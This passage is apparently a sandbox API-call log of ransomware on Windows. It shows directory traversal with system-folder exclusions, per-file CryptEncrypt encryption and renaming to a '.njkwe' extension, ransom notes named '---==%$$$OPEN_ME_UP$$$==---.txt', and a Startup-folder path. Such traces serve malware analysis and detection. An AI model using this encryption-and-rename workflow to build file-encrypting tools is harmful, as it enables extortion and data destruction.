pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov") returned 85 [0076.116] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.116] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.116] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.116] GetProcessHeap () returned 0xbe0000 [0076.116] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.116] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*") returned 87 [0076.116] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0076.116] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.116] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.116] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.116] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.116] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.116] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\.") returned 87 [0076.116] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.117] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.117] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.117] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.117] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.117] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.117] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.117] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\..") returned 88 [0076.117] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.117] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.117] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.117] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.117] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.117] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.117] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.117] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.117] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime") returned 93 [0076.117] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.117] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.117] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.117] GetProcessHeap () returned 0xbe0000 [0076.117] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.117] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*") returned 95 [0076.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0076.120] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.120] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.120] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.120] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.120] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.120] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\.") returned 95 [0076.120] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.120] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.120] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.120] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.120] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.121] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.121] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.121] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\..") returned 96 [0076.121] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.121] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.121] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fdcb85, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fdcb85, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fdcb85, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 1 [0076.121] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Windows") returned -1 [0076.121] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="$Recycle.bin") returned 1 [0076.121] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="System Volume Information") returned -1 [0076.121] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files") returned -1 [0076.121] lstrcmpiW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="Program Files (x86)") returned -1 [0076.121] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml") returned 133 [0076.121] StrStrIW (lpFirst="0__Power_EnergyEstimationEngine.provxml", lpSrch=".njkwe") returned 0x0 [0076.121] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.121] lstrcmpW (lpString1="0__Power_EnergyEstimationEngine.provxml", lpString2="taridd") returned -1 [0076.121] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_Ener", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.121] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\0__power_energyestimationengine.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.125] GetTickCount () returned 0x1153600 [0076.125] GetTickCount () returned 0x1153600 [0076.125] GetTickCount () returned 0x1153600 [0076.126] GetTickCount () returned 0x1153600 [0076.126] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.126] GetProcessHeap () returned 0xbe0000 [0076.126] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.126] ReadFile (in: hFile=0x43c, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380edc4*=0x1bae, lpOverlapped=0x0) returned 1 [0076.129] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffe452, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.129] WriteFile (in: hFile=0x43c, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1bae, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380edc4*=0x1bae, lpOverlapped=0x0) returned 1 [0076.129] GetProcessHeap () returned 0xbe0000 [0076.129] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.129] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.129] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.129] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.129] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.129] CloseHandle (hObject=0x43c) returned 1 [0076.129] GetProcessHeap () returned 0xbe0000 [0076.129] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.129] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe") returned 153 [0076.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\0__power_energyestimationengine.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\0__Power_EnergyEstimationEngine.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\0__power_energyestimationengine.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.130] GetProcessHeap () returned 0xbe0000 [0076.130] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.130] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fdcb85, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fdcb85, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fdcb85, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_EnergyEstimationEngine.provxml", cAlternateFileName="")) returned 0 [0076.130] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0076.130] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0076.130] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.130] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0076.131] CloseHandle (hObject=0x438) returned 1 [0076.131] GetProcessHeap () returned 0xbe0000 [0076.131] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.131] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54002dee, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54002dee, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54002dee, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0076.132] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0076.132] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0076.132] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0076.132] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0076.132] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0076.132] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml") returned 97 [0076.132] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0076.132] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.132] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0076.132] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.132] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0076.132] GetTickCount () returned 0x1153600 [0076.132] GetTickCount () returned 0x1153600 [0076.132] GetTickCount () returned 0x1153600 [0076.132] GetTickCount () returned 0x1153600 [0076.132] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0076.132] GetProcessHeap () returned 0xbe0000 [0076.132] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.132] ReadFile (in: hFile=0x438, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.133] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.133] WriteFile (in: hFile=0x438, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f04c*=0x1cc, lpOverlapped=0x0) returned 1 [0076.133] GetProcessHeap () returned 0xbe0000 [0076.133] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.133] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.133] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0076.134] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0076.134] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0076.134] CloseHandle (hObject=0x438) returned 1 [0076.134] GetProcessHeap () returned 0xbe0000 [0076.135] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.135] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0076.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.135] GetProcessHeap () returned 0xbe0000 [0076.135] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0076.135] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54002dee, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54002dee, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x54002dee, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0076.135] FindClose (in: hFindFile=0xc1a0a0 | out: hFindFile=0xc1a0a0) returned 1 [0076.135] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0076.135] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.136] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0076.137] CloseHandle (hObject=0x434) returned 1 [0076.137] GetProcessHeap () returned 0xbe0000 [0076.137] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.137] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1ab71b, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1ab71b, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1ab71b, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0076.137] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0076.137] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0076.137] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0076.147] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0076.148] CloseHandle (hObject=0x430) returned 1 [0076.148] GetProcessHeap () returned 0xbe0000 [0076.148] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0076.148] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", cAlternateFileName="{9DF6A~1")) returned 1 [0076.148] lstrcmpiW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="Windows") returned -1 [0076.148] lstrcmpiW 